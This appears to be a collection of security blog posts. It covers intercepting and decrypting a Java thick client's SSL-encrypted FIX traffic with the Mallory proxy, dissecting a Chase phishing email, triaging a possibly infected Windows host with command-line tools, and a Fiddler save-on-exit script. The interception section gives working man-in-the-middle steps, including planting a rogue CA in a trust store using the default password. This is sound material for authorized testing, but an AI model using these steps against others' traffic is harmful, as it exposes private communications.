In the Protocols tab on the GUI, find the line in Protocol Configuration that looks like:

;http_1:http.HTTP:80


Mallory uses the semi-colon as the comment character. Since we want to enable capture on this protocol, remove the leading ‘;’ so that the line looks like:

http_1:http.HTTP:80


Each line consists of three fields, colon-separated. The first field (“http_1”) is a user-friendly name for the traffic type; we can set this to anything we want. The second field (“http.HTTP”) instructs Mallory how to decode the traffic and correlates to the python code. The third field (“80”) tells Mallory which TCP port it should intercept. Click ‘apply’ to save the changes. You will also see a debug message in Terminal 1 to show HTTP is enabled.


Figure 12: Apply the HTTP protocol MiTM.


For initial testing, only the Interface and Protocol tabs need to be edited. The other tabs will come into play a little later.

To make sure that we’re properly intercepting traffic, switch to the testing VM and open a web browser. Browse to a website normally (such as http://www.google.com) and, if traffic is routing correctly, you should see the images flipped and inverted like in the image below.


Figure 13: www.google.com, with the doodle flipped and inverted by Mallory.


Additionally, every request intercepted by Mallory should generate a DEBUG message in Terminal 1. Look for messages beginning with ‘DEBUG:HTTP’.

Decrypting SSL Traffic

Mallory’s interception of different protocol types is configured by changing the configuration lines in the Protocols tab. First, turn HTTP capture back off by commenting out the line in the protocol configuration tab:

;http_1:http.HTTP:80


Then configure Mallory to perform SSL Man-in-the-Middle, which is what we need for this application. Uncomment (or add) a line instructing Mallory to intercept SSL communications on port 443:

ssl:sslproto.SSLProtocol:443


Click Apply at the bottom. The mallory.py window will print out a debug message reporting that the SSLProtocol module is starting:


Figure 14: Starting SSL MiTM in Mallory.


At the time of writing, the ‘Configured Protocols’ section of the Protocols tab states that SSL Base is not debuggable; this is actually a bug in Mallory. A fix is available, but for our purposes, this is mainly an aesthetic issue. (https://groups.google.com/forum/#!topic/mallory-proxy/PF2MwXOpcEg)

Next, visit the Rules tab and locate the "Debug All" rule. The Rules tab allows the user to choose which messages to show in the Streams tab. Some of the options are server-to-client, client-to-server, both, port, etc. Inspect the options that are set in the "Debug All" rule. No changes from the defaults are needed, so ensure that the rule matches the screenshot below, and hit Save Rule.


Figure 15: Starting the "Debug All" rule.


Switch over to the Streams tab and, to start intercepting traffic, click the ‘Intercept’ and ‘Auto Send’ buttons. Later on, if we need to do interactive manipulation, we’ll turn Auto Send off; but keep it on right now for testing purposes.

Once everything is configured, switch back to the testing VM and browse to an SSL site (such as https://www.google.com). The browser will report an SSL certificate error; Mallory is generating a fake SSL certificate and then re-encrypting the communications to the target server. Confirm the security exception, and the target page should load. Switch back to the Mallory VM, and we can see the request in the intercepting tab.


Figure 16: Mallory has captured an HTTP request sent via SSL to 74.125.224.82 – google.com – on port 443.


FIX over SSL

So Mallory can successfully intercept SSL traffic (albeit with some more or less unavoidable certificate errors), but our thick client is sending SSL-encrypted FIX, not HTTP. First, we need to identify which port (or ports) the thick client is using to send data. I was given this information (port 32001, in my case), but if you don’t know which port you need to intercept, use Wireshark to monitor outgoing traffic and isolate your target traffic. Add a line to the Protocols tab for the identified port:

fixssl:sslproto.SSLProtocol:32001


Click Apply to save changes. For testing purposes, keep the “DebugAll” rule enabled, and make sure Intercept and Auto Send are both enabled.

We’re not quite done yet. If you fire up your client immediately, you'll end up with errors like this one:


Figure 17: Client refusing the SSL handshake.


The client refused to handshake to Mallory, since Java was (correctly!) flagging Mallory’s generated SSL certificate as unknown. In a nutshell, we need to import Mallory’s CA certificate into the Java trust store for our application. In this case, there are two options:

  • The thick client had a configuration file with an application-specific trust store called “client_truststore”:
    <ssl dir="config"
    trustStoreFile="client_truststore">
    However, this trust store is password-protected, so adding a certificate is non-trivial.
  • The Java Runtime Engine installed on most systems has a system-wide trust store file. On my system, this file lived in:
    C:\Program Files\Java\jre6\lib\security\cacerts
    This trust store is also password protected, but the password is ‘changeit’. Obviously, nobody changed it.


Once we know where our trust store is, adding a certificate is pretty straightforward. We need three things:
  1. Mallory’s CA certificate, named “ca.cer” (from /home/mallory/mallory/current/src/ca/ca.cer)
  2. The system trust store file, named “cacerts” (from C:\Program Files\Java\jre6\lib\security\cacerts)
  3. The Java ‘Keytool’ application (from C:\Program Files\Java\jre6\bin)


Copy ca.cer and cacerts to the thick client’s working directory. We don’t want to import this certificate into our system-wide trust store, because that could put traffic other than our thick client traffic at risk. Putting these together is a snap. Just run the following command, which will import the Mallory CA certificate into the cacerts trust store:

"C:\Program Files\Java\jre6\bin\keytool.exe" -import -alias malloryca -file ca.cer -keystore cacerts -storepass changeit



Keytool will prompt you to trust the certificate; tell it “yes:”
Trust this certificate? [no]: yes



Figure 18: Adding certificate to keystore
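To double-check that the import actually landed in the right trust store, you can list the alias back out (assuming the same working directory and default paths as above):

"C:\Program Files\Java\jre6\bin\keytool.exe" -list -keystore cacerts -storepass changeit -alias malloryca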


Finally, we need to reconfigure the thick client to use our new vulnerable cacerts trust store instead of the old, secure, vendor-provided trust store. Going back to the application configuration where we originally saw the "client_truststore" reference, change the "<ssl" line to read as follows:

<ssl dir="config" trustStoreFile="cacerts">


Now that the Java thick client is using the trust store file containing the Mallory certificate, let’s see if Mallory can intercept and decrypt the FIX protocol messages:


Figure 19: Mallory performing a MiTM on SSL encrypted FIX traffic.


Awesome!

Recap

What we’ve done:

  • Setup and configured Mallory;
  • Routed traffic through Mallory, both HTTP and HTTPS;
  • Added a custom certificate to a keystore and successfully MiTM’ed a Java thick client; and
  • Successfully decoded and intercepted the FIX protocol.

Phishing 101 - Subject: Access Blocked

By Jerry Pierce.

Give a man food, and he’ll eat for one day – teach a man to PHISH and he’ll use your credit card to live a lifetime. Well, at least until you notify your bank…

Earlier this week, Brad Antoniewicz came across a piece of spam in his mailbox that caught his attention - it was strangely professional. He offered up the e-mail to anyone in Foundstone who was curious, and I chose to dive in!

Taking a look, the email itself looks fairly solid with the exception of the originating email address of “chase@accounts.com” which should start alarm bells ringing:



If you banked with Chase you would be very alarmed at the seeming legitimacy of this email alert!

If you open the “Restore Access Form” which is attached, you get presented with a very official looking interface to what purports to be chaseonline.chase.com:



The primary reason that everything looks so legit is that the hacker is pulling the graphical images from the legitimate “chaseonline.chase.com” site.

Sharp-eyed and paranoid users might notice that the connection the form opened isn’t using HTTPS and that everything you enter traverses the internet in clear text. No banking site would consider prompting you for that sort of critical financial information without safeguarding it via HTTPS.

If you “hover” over the “NEXT” button, instead of “http://www.chase.com” being displayed we see the true destination of any information you enter:



Hrmm... http://80.15.197.249/s/w.php looks pretty suspicious!

Following up this trail, we start by using one of the online Registries to determine the country and ownership of the IP address in question. Since we don’t know off-hand where that IP resides, we’ll query the American Registry of Internet Numbers or “ARIN” which identifies the IP address as being managed by “RIPE” for EMEA based resolution.
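From a command line, the same lookup can be done with the standard whois client, which should follow the referral from ARIN and land you at the RIPE record for the block:

 $ whois 80.15.197.249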

Once there, a “whois” lookup shows that the IP address receiving the credit card data is part of a network block allocated to France Telecom:



So while the email looks legit and has a potentially true “ring” to it, always be suspicious and rather than just supplying this sort of information to a nameless site somewhere on the internet, contact your bank or credit card provider directly for confirmation of any problem.

The site is already down, or at least unresponsive, and a quick search for 80.15.197.249 results in this https://www.phishtank.com/phish_detail.php?phish_id=1438995 which identifies it as a phish!

So remember, don't open that attachment or click that link!

Here are a couple phishing references (courtesy of Chris Silvers):

Am I pwn3d? Windows *Native* Tool Triage

By Tony Lee and Jerry Pierce.

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps--using native Windows binaries--that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system.

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory


If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and other information.

tasklist >> output.txt

Sample Output
C:\>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
System 4 Console 0 212 K
smss.exe 604 Console 0 404 K
csrss.exe 652 Console 0 1,996 K
winlogon.exe 676 Console 0 3,468 K
services.exe 720 Console 0 3,368 K
lsass.exe 732 Console 0 5,972 K
svchost.exe 892 Console 0 4,764 K
svchost.exe 960 Console 0 4,164 K
svchost.exe 1072 Console 0 19,276 K
svchost.exe 1132 Console 0 3,484 K
svchost.exe 1272 Console 0 3,064 K
explorer.exe 1408 Console 0 15,252 K
VMwareUser.exe 1648 Console 0 2,888 K
ctfmon.exe 1660 Console 0 3,004 K
wracing.exe 1680 Console 0 1,220 K
sqlmangr.exe 1692 Console 0 4,804 K
svchost.exe 1808 Console 0 3,700 K
inetinfo.exe 1864 Console 0 7,904 K
sqlservr.exe 1880 Console 0 7,768 K
VMwareService.exe 128 Console 0 2,236 K
alg.exe 1168 Console 0 3,536 K
cmd.exe 1928 Console 0 2,836 K
defrag.exe 1396 Console 0 3,304 K
dfrgntfs.exe 1260 Console 0 9,556 K
wmiprvse.exe 1756 Console 0 5,876 K
firefox.exe 380 Console 0 24,852 K
tasklist.exe 1284 Console 0 4,312 K

Once the command has been executed, a well-trained eye can usually spot an oddly named program that is running; however, some malware will try to appear as innocuous as possible and won’t stand out from the process name alone. If something is unfamiliar, there are many sites that can be used to investigate a binary name, such as http://www.processlibrary.com/. (No results from processlibrary.com can be as concerning as a positive bad hit.)

ProcessLibrary.com Example

Search results for: wracing.exe
Your search "wracing.exe" did not match any documents. Make sure the search term was spelled correctly.

Examine Network Connections


The following command has been natively present in Windows for ages; however, the -o option has been available since at least Windows XP and 2003. The -o option provides the PID of the process that is holding the port open. This PID can be cross referenced with the process information that you pulled in the previous section to examine the process name that is holding the port open.

netstat -ano >> output.txt

Sample Output

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 960
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 1864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1864
TCP 127.0.0.1:1030 0.0.0.0:0 LISTENING 1168
TCP 127.0.0.1:1737 127.0.0.1:1738 ESTABLISHED 380
TCP 127.0.0.1:1738 127.0.0.1:1737 ESTABLISHED 380
TCP 127.0.0.1:1741 127.0.0.1:1742 ESTABLISHED 380
TCP 127.0.0.1:1742 127.0.0.1:1741 ESTABLISHED 380
TCP 192.168.200.53:139 0.0.0.0:0 LISTENING 4
TCP 192.168.200.53:1743 74.125.239.18:80 ESTABLISHED 380
TCP 192.168.200.53:1745 74.125.239.18:80 ESTABLISHED 380
TCP 192.168.200.53:1746 72.235.63.10:80 ESTABLISHED 380
TCP 192.168.200.53:1747 72.235.63.19:80 ESTABLISHED 380
TCP 192.168.200.53:1749 74.125.239.6:80 ESTABLISHED 380
TCP 192.168.200.53:1750 63.232.79.43:443 ESTABLISHED 1680
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 732
UDP 0.0.0.0:3456 *:* 1864
UDP 0.0.0.0:4500 *:* 732
UDP 127.0.0.1:123 *:* 1072
UDP 192.168.200.53:123 *:* 1072
UDP 192.168.200.53:137 *:* 4
UDP 192.168.200.53:138 *:*

You are looking for any “odd” port that is listening as this might indicate the malware has placed a backdoor onto your system, or any connections to odd sites/locations around the world which you haven’t initiated.

We realize that netstat -anb can provide even more information to include the libraries that are associated with the PID, however this takes longer to run and may not be allowed to run without elevating the prompt in Windows 7.

Examine Common File Locations


The following command has been natively present in Windows since the dawn of time, however the options may not be well known to you or your family members. Running the “dir” command with the following syntax will produce a listing that is sorted by the file creation time.

System32


Many files are located here, and thus this is a common place for malware to hide among the weeds.

dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output

C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010 05:48 PM 689,152 xpsp3res.dll
01/07/2010 06:02 PM <DIR> en
01/07/2010 06:02 PM <DIR> scripting
01/07/2010 06:02 PM <DIR> en-us
01/07/2010 06:19 PM 1,676,288 xpssvcs.dll
01/07/2010 06:19 PM 575,488 xpsshhdr.dll
01/07/2010 06:19 PM 117,760 prntvpt.dll
01/07/2010 06:20 PM <DIR> XPSViewer
01/07/2010 06:34 PM 2,560 xpsp4res.dll
01/07/2010 07:39 PM 25,966,024 MRT.exe
01/07/2010 07:50 PM 3,706 TZLog.log
2009 File(s) 408,261,849 bytes
52 Dir(s) 2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because the attacker has permission to write to these locations under the context of the user.

dir /a /s /o:d /t:c "%USERPROFILE%" >> output.txt

Sample Output

dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010 07:00 PM 54,272 Set29F.tmp
01/07/2010 07:42 PM <DIR> NDP1.1sp1-KB953297-X86
01/07/2010 07:47 PM 14,010 ASPNETSetup_00002.log
09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll
09/13/2010 09:28 PM <DIR> plugtmp
03/23/2012 01:43 PM <DIR> VMwareDnD
03/23/2012 02:54 PM 104 pdracing.tmp
-SNIP-

The filenames above are from real malware--we did not make those up.

Investigating Persistence


Sometimes the persistence mechanism (the way malware tries to assure its continued existence on a system) can give away the presence of malicious software. The following persistence mechanisms will be examined:

  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory


Examine Services


The following command has been natively present in Windows since before the dawn of time. This command is commonly used to list the started services.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
FTP Publishing
Help and Support
IIS Admin
IPSEC Services
Logical Disk Manager
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
Plug and Play
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VMware Tools Service
WebClient
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Workstation
World Wide Web Publishing

The command completed successfully.

The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and the keyname for the service.

tasklist /svc >> output.txt

Sample Output
C:\>tasklist /svc

Image Name PID Services
========================= ====== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 604 N/A
csrss.exe 652 N/A
winlogon.exe 676 N/A
services.exe 720 Eventlog, PlugPlay
lsass.exe 732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe 892 DcomLaunch, TermService
svchost.exe 960 RpcSs
svchost.exe 1072 Browser, CryptSvc, Dhcp, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, seclogon, SENS, SharedAccess,
ShellHWDetection, TapiSrv, TrkWks, W32Time,
winmgmt, wscsvc, wuauserv
svchost.exe 1132 Dnscache
svchost.exe 1272 LmHosts, RemoteRegistry
explorer.exe 1408 N/A
VMwareUser.exe 1648 N/A
ctfmon.exe 1660 N/A
wracing.exe 1680 N/A
sqlmangr.exe 1692 N/A
svchost.exe 1808 WebClient
inetinfo.exe 1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe 1880 MSSQLSERVER
VMwareService.exe 128 VMTools
alg.exe 1168 ALG
cmd.exe 1928 N/A
firefox.exe 380 N/A
notepad.exe 1344 N/A
tasklist.exe 1820 N/A
wmiprvse.exe 1892 N/A

Additional analysis could include digging further into a particular service shown above. A great native tool for this is sc (service control):

sc qc [service keyname] >> output.txt

Sample Output
C:\>sc qc webclient
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: webclient
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP : NetworkProvider
TAG : 0
DISPLAY_NAME : WebClient
DEPENDENCIES : MRxDAV
SERVICE_START_NAME : NT AUTHORITY\LocalService
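
sc qc shows how the service is configured to start; if you also want the service's current state (running, stopped, etc.), sc query works the same way. For example, against the same service:

sc query webclient >> output.txt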

Examine Registry Entries


The following command has been natively present in Windows for quite some time--however, the keys are the ones examined by Sysinternals' autoruns:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

Sample Output
C:\>reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ctfmon.exe REG_SZ C:\WINDOWS\system32\ctfmon.exe
wracing REG_SZ C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.
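
If the common Run keys come up clean, a few other standard autostart locations are worth a quick query as well (these are well-known Windows keys, not ones taken from the output above):

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell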

Examine Scheduled Tasks


The following command has been natively present in Windows for quite a while; however, it is falling out of favor in Windows 7 and 2008:

at >> output.txt

Sample Output
C:\>at
There are no entries in the list.

Windows 7 and 2008 prefer the following newer command:

schtasks >> output.txt

Sample Output

C:\Documents and Settings\Administrator>schtasks

TaskName Next Run Time Status
=================================== ====================== ===============
Ezyme 16:33:00, 3/23/2012
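
If more detail is needed, schtasks can also produce a verbose listing that includes the command each task actually runs (supported on XP/2003 and later):

schtasks /query /fo LIST /v >> output.txt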

Examine Startup Directory


We will use the ‘dir’ command again in order to inspect the startup directory specifically:

dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\[username]\Start Menu\Programs\Startup"
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Sample Output
C:\>dir "c:\documents and settings\Administrator\start menu\programs\startup"
Volume in drive C has no label.
Volume Serial Number is 442E-ACB9

Directory of c:\documents and settings\Administrator\start menu\programs\startup

11/15/2006 01:37 PM <DIR> .
11/15/2006 01:37 PM <DIR> ..
11/15/2006 01:37 PM 607 putbginfo.bat.lnk
1 File(s) 607 bytes
2 Dir(s) 2,503,716,864 bytes free

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
wracing.exe 1680 Console 0 1,220 K

It also has a connection out to a known bad site:

  TCP    192.168.200.53:1750    63.232.79.43:443       ESTABLISHED     1680

Malicious files are present in the following directory:


C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll

The persistence mechanism is via the registry:

"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
wracing REG_SZ C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

C:\Documents and Settings\Administrator>schtasks
TaskName Next Run Time Status
=================================== ====================== ===============
Ezyme 16:33:00, 3/23/2012

Food for Thought


If the infection is using rootkit technology, there is a good chance that the native Windows tools will not show you anything. If nothing shows up as indicators of compromise, but you (or your relatives) are still convinced the system is owned--look for our next post (Am I P0wn3d? Lesson 102 - Windows *Non-Native* Tool Triage) which leverages non-native tools which may provide more insight into the potential breach. Non-native tools may also pull the same information without using the traditional Windows APIs, which can help discover the presence of rootkit technology. Happy hunting!

What Native Tips Do You Have?


Do you have any tips or tricks using Native Windows tools? Share them in the comments below!!!

Saving Fiddler Sessions on Exit

By Neelay Shah.

If you are like me and love to use Fiddler frequently, it can be incredibly frustrating when you close Fiddler by mistake or in a hurry and all your work is lost, since Fiddler does not prompt you to save the sessions (or autosave them) before closing. Now the great thing about Fiddler is that it is extremely extensible, so I customized the existing Fiddler rules so that the user is prompted to save the session when Fiddler is closed.

Before we get into the details of the customized rule let’s spend a few minutes understanding how Fiddler’s “Load Archive” and “Save” features work –

  1. Fiddler does not have an “auto save” feature and as such if you do not explicitly save the session(s) then your session(s) are lost as soon as Fiddler is closed.
  2. The “Save” functionality saves the captured sessions as a snapshot in time. So, if you explicitly save a Fiddler session, continue browsing the web application (being proxy'ed through Fiddler), and then exit Fiddler (without saving), all the new sessions that were captured after the previous “Save” operation are lost.
  3. The “Load Archive” functionality loads and appends the user selected session archive to the already open and existing capture. Now if the “Save” operation is invoked then the current capture plus the existing session archive (that was loaded) is saved as a new session archive.


Now let’s look at the rule modifications that will cause Fiddler to allow the user to save sessions when Fiddler is closed. I have tested this with Fiddler v2.3.9.3. I recommend installing the Syntax Highlighting extension - http://fiddler2.com/redir/?id=SYNTAXVIEWINSTALL before attempting to modify the FiddlerScript Rules. Once you install the Syntax Highlighting extension, launch Fiddler and you should see a new tab “FiddlerScript” (between the Composer and the Filters tab). Click the “FiddlerScript” tab and that should open the Rules file. Then you can add the following code appropriately and click “Save Script”.

You will most likely already have an OnShutdown() function, in which case simply add the following code to the beginning of the OnShutdown() function.

   
static function OnShutdown() {
    // MessageBox.Show("Fiddler has shutdown");
    var exitPromptResult: DialogResult;

    exitPromptResult = MessageBox.Show("Do you want to save this session before Fiddler exits?", "Save on Exit", MessageBoxButtons.YesNo, MessageBoxIcon.Warning, MessageBoxDefaultButton.Button1);

    if (DialogResult.Yes != exitPromptResult)
    {
        // The user does not want to save the capture so proceed to exit
        return;
    }

    // The user selected Yes - Allow the user to save the capture
    FiddlerApplication.UI.actSelectAll();
    FiddlerApplication.UI.actSaveSessionsToZip();
}



Once you add this code and save the Script Rules, the rule will be in effect and Fiddler will start using it. Now when you close Fiddler, it should prompt you to save the capture. The behavior of this “Save on Exit” prompt is as follows -

  • If you select “No” then the capture will not be saved and Fiddler will exit
  • If you select “Yes” but then select “Cancel” on the ensuing “Save Session Archive to…” dialog, the capture will not be saved and Fiddler will exit
  • If you select “Yes” and enter an appropriate archive name and select “Save” on the ensuing “Save Session Archive to…” dialog then the capture will be saved to the appropriate archive.



Am I pwn3d? Windows *Non-Native* Tool Triage

By Tony Lee, Jerry Pierce, and Vijay Agarwal.

This is a continuation of our previous article on performing a Windows triage--however this time we will try to avoid using native Windows tools. Note that there are lots of GUI tools that can help perform basic forensics; however, we use mostly command line tools or options because they do not trample on evidence as much as the GUI tools and they make writing the data to a file easier for offline analysis. We will continue with the same premise as before:

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps--using mostly non-native Windows binaries--that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system.

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory

If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following tool, pslist, is from Mark Russinovich (of sysinternals--now Microsoft). Pslist can be downloaded from http://technet.microsoft.com/en-us/sysinternals/bb896682. It will list the process name, process ID (PID), CPU Time and other information.

pslist >> output.txt

Sample Output
C:\>pslist

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name Pid Pri Thd Hnd Priv CPU Time Elapsed Time
Idle 0 0 1 0 0 3:57:34.937 0:00:00.000
System 4 8 48 340 0 0:01:01.421 0:00:00.000
smss 604 11 3 19 168 0:00:00.031 4:05:30.375
csrss 652 13 12 375 1772 0:00:15.000 4:05:29.265
winlogon 676 13 17 547 7400 0:00:01.171 4:05:29.109
services 720 9 15 261 1664 0:00:03.859 4:05:28.609
lsass 732 9 22 357 3764 0:00:03.968 4:05:28.562
svchost 892 8 14 190 2888 0:00:01.156 4:05:27.890
svchost 960 8 7 235 1640 0:00:02.656 4:05:27.609
svchost 1072 8 67 1251 14668 0:00:20.593 4:05:27.406
svchost 1132 8 6 80 1272 0:00:02.156 4:05:26.875
svchost 1272 8 5 90 1196 0:00:02.781 4:05:26.625
explorer 1408 8 9 330 10304 0:00:15.421 4:05:25.578
VMwareUser 1648 8 1 26 888 0:00:01.000 4:05:23.937
ctfmon 1660 8 1 69 840 0:00:01.546 4:05:23.843
wracing 1680 8 1 19 324 0:00:41.609 4:05:23.687
sqlmangr 1692 8 2 76 1252 0:01:35.203 4:05:23.609
svchost 1808 8 5 107 1272 0:00:03.968 4:05:18.156
inetinfo 1864 8 18 269 3992 0:00:14.140 4:05:17.953
sqlservr 1880 8 21 214 13068 0:00:01.640 4:05:17.859
VMwareService 128 13 3 47 696 0:01:25.015 4:05:14.359
alg 1168 8 6 105 1132 0:00:01.656 4:05:11.046
cmd 1928 8 1 31 2264 0:00:07.937 3:58:41.046
firefox 380 8 12 343 19320 0:00:04.187 2:55:04.140
notepad 1344 8 1 45 1268 0:00:01.531 2:51:28.015
autoruns 1564 8 5 287 12564 0:00:41.437 2:34:45.015
pslist 696 13 2 115 1040 0:00:00.156 0:00:00.250

Pay attention to oddly named processes, and also look at the “Elapsed Time” column – if the oddly named process appears to have the same elapsed time as the bulk of your Windows processes, it’s a clue that it may be starting either at system boot or when you log into the system.

Another "pslist" option will display the output in a tree format to easily show the parent process and the rest of the process chain.

pslist -t >> output.txt

Sample Output
C:\>pslist -t

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name Pid Pri Thd Hnd VM WS Priv
Idle 0 0 1 0 0 16 0
System 4 8 48 340 1884 212 0
smss 604 11 3 19 3808 404 168
csrss 652 13 12 375 25740 2144 1772
winlogon 676 13 17 547 51648 4188 7400
services 720 9 15 261 20220 3400 1664
VMwareService 128 13 3 47 17764 2256 696
svchost 892 8 14 190 59652 4728 2888
svchost 960 8 7 235 33644 4148 1640
svchost 1072 8 67 1251 138856 24388 14668
svchost 1132 8 6 80 29572 3496 1272
alg 1168 8 6 105 32288 3536 1132
svchost 1272 8 5 90 30980 3248 1196
svchost 1808 8 5 107 35608 3700 1272
inetinfo 1864 8 18 269 43944 7904 3992
sqlservr 1880 8 21 214 559284 7768 13068
lsass 732 9 22 357 41392 6004 3764
explorer 1408 8 9 330 81936 15356 10304
firefox 380 8 12 343 85196 29884 19320
VMwareUser 1648 8 1 26 27996 2888 888
ctfmon 1660 8 1 69 29208 3008 840
sqlmangr 1692 8 2 76 35200 4804 1252
cmd 1928 8 1 31 30848 980 2264
pslist 152 13 2 115 29292 2628 1040
notepad 1344 8 1 45 30304 3768 1268
autoruns 1564 8 5 287 96192 16500 12564
wracing 1680 8 1 19 7480 1220 324

The next tool--cmdline--will list the PID, the process, and the command line arguments, and show the full path to the binary (how helpful!). The tool used to be available from www.diamondcs.com.au; however, the site now appears to be squatted and no longer hosts the tool. You may be able to find this from a reputable friend in the business (feel free to look us up at Foundstone and we can send you a copy--malware free!).

cmdline >> output.txt

Sample Output
C:\>cmdline
CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 30 processes.

-snip-

C:\WINDOWS\system32\services.exe [720]
C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\ctfmon.exe [1660]
"C:\WINDOWS\system32\ctfmon.exe"

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
"C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\WINDOWS\system32\notepad.exe [1908]
notepad test.txt

Once the command has been executed, a well-trained eye can usually spot something odd. If something is unfamiliar, there are many sites that can be used to investigate a binary name such as http://www.processlibrary.com/.

Getting no results from processlibrary.com can be just as concerning as a positive bad hit:

Example:
Search results for: wracing.exe
Your search "wracing.exe" did not match any documents.
Make sure the search term was spelled correctly.
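
If a name search is inconclusive, hashing the suspicious file and searching on the hash is another option. One way to do this is with sigcheck, another Sysinternals tool (the -h option prints file hashes in recent versions of the tool; check sigcheck's usage output if your copy differs):

sigcheck -h "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe" >> output.txt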

Examine Network Connections


The following tool, CurrPorts, is from Nirsoft and is available from http://www.nirsoft.net/utils/cports.html. Please see the full manual at the download site for the many options available. We are just listing our favorite options below:

